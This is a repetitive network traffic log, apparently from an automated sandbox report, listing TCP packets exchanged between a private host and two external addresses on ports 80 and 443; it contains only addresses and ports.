                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
